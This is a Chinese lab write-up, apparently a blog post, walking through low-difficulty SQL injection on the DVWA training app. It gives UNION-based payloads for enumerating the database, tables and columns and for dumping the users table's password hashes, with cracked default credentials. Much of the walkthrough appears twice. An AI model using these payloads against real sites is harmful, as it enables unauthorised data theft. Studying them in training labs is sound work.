sql注入(dvwa靶场,难度:低级)

Sql注入

1.判断注入类型--是字符型还是数字型

1'+and+1='1

1'+and+1='2

说明是字符型

2.判断字段数

1'+order+by+2--+(注意在网页里面--+相当于#,+相当于空格)

    当输入1和2时候都有显示但是输入3的时候报错了,说明只有两个字段,即是这里的First name、surname。

3.判断回显位置

输入1'+union+select+1,2--+

查询成功,说明执行的SQL语句为select First name,Surnamefrom表 where ID=’ id’

4.爆破当前数据库名database()以及数据库的用户名user()

1'+union+select+databse(),user()--+

information_schema--元数据库---默认数据库

schemata表---默认的表名---存了其他数据库的库名

tables表---默认的表名-----存了其他数据库的表名---table_Schema(存当前数据库名),table_name(存当前数据库的表名)

columns表---默认的表名----存了其他数据库的字段名---column_name

说明当前的数据库为dvwa。

5.爆破表名--users,guestbook

1'+union+select+1,table_name+from+information_schema.tables+where+table_schema='dvwa'--+

说明数据库dvwa中一共有两个表,分别是guestbook,users。

6.字段名

1'+union+select+1,column_name+from+information_schema.columns+where+table_schema='dvwa'+and+table_name='users'--+

说明users表中有8个字段,分别是users_id,first_name,users,password,avater,last_login,failed_login.

7.获取账号密码

1'+union+select+user,password+from+users--+

网页里面写

1' union select user,password from users#

然后通过md5 解密可以得到这些账号和密码admin->password,

gordonb->abc123,1337->charley,pablo->letmein,smithy->password

        

          

       

   

  

         

         

 

         

              

     

 

       

    当输入1和2时候都有显示但是输入3的时候报错了,说明只有两个字段,即是这里的First name、surname。

3.判断回显位置

输入1'+union+select+1,2--+

查询成功,说明执行的SQL语句为select First name,Surnamefrom表 where ID=’ id’

4.爆破当前数据库名database()以及数据库的用户名user()

1'+union+select+databse(),user()--+

information_schema--元数据库---默认数据库

schemata表---默认的表名---存了其他数据库的库名

tables表---默认的表名-----存了其他数据库的表名---table_Schema(存当前数据库名),table_name(存当前数据库的表名)

columns表---默认的表名----存了其他数据库的字段名---column_name

说明当前的数据库为dvwa。

5.爆破表名--users,guestbook

1'+union+select+1,table_name+from+information_schema.tables+where+table_schema='dvwa'--+

说明数据库dvwa中一共有两个表,分别是guestbook,users。

6.字段名

1'+union+select+1,column_name+from+information_schema.columns+where+table_schema='dvwa'+and+table_name='users'--+

说明users表中有8个字段,分别是users_id,first_name,users,password,avater,last_login,failed_login.

7.获取账号密码

1'+union+select+user,password+from+users--+

网页里面写

1' union select user,password from users#

然后通过md5 解密可以得到这些账号和密码admin->password,

gordonb->abc123,1337->charley,pablo->letmein,smithy->password

        

          

       

   

  

         

         

 

         

              

     

 

       

四、实验总结

实验成绩

评语

  

四、实验总结

实验成绩

评语

  

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值